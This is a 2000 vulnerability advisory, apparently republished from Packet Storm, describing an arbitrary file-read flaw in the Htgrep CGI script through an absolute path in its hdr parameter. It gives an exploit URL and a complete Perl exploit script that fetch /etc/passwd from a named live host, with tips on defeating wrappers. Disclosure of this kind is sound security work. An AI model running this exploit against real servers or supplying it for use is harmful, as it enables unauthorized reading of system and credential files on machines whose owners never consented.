Htgrep has a vulnerability which allows a remote user to read arbitrary files on the system with the priviledge of the user running the program.
c01230dec2a91deb2f424d3380ac2843757db64552164f3d93bd6365f519b20bSoftware: Htgrep
URL: http://www.iam.unibe.ch/~scg/Src/Doc/
Version: All Versions
Platforms: Unix
Author status: Notified
Summary:
Any remote user can view arbitrary files on the system with the
privileges of the web user
Vulnerability:
The CGI allows a user to specify a header and footer file to be
appended to the search output, this file should be located in the wwwroot
which is specified in the script itself. Any attempt to specify a header
or footer file by using backwards directory referencing is trapped. Although
it is possible to specify a file using an absolute path.
Exploit:
http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd
The File /etc/passwd will be displayed instead of the default header
file.
Fixes:
The author has been notified, it is likely that an update will be
available shortly.
n30
n30@gmx.co.uk
Exploit Follows:
---------------------------------CUT-------------------------------------
#!/usr/local/bin/perl
#
# Htgrep EXPLOIT Script by n30 17/8/2000
#
# For: Unix/Linux all Distro's
# maybe Winnt?? anyone??
#
# Versions: All upto latest: htgrep v3.0
#
# Info: to find the version number being used:
#
# www.server.com/cgi-bin/htgrep/version
#
# Some ppl use a wrapper for the script thusly
# eliminating the file argument, the sploit will
# still werk just add &hdr=<filename> to the end :-)
#
# if &isindex=<text> is present in the URL REMOVE IT!!!
# or else the exploit won't werk :-)
#
# Mail : n30@gmx.co.uk
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $ua = new LWP::UserAgent;
# *************************************************
my $TargetHost="www.dematel.com";
my $TargetPath="/cgibin/htgrep";
# SearchFile can commonly be index.html or some other file in the wwwroot
my $SearchFile="index.html";
# FiletoGet ?? think for ur self :-)
my $FiletoGet="/etc/passwd";
# **************************************************
my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";
print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
print("URL: $url\n\n");
my $request = new HTTP::Request('GET', $url);
my $response = $ua->request($request);
if ($response->is_success) {
print $response->content;
} else {
print $response->error_as_HTML;
}
# Definitely NOT Hack.co.za #
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed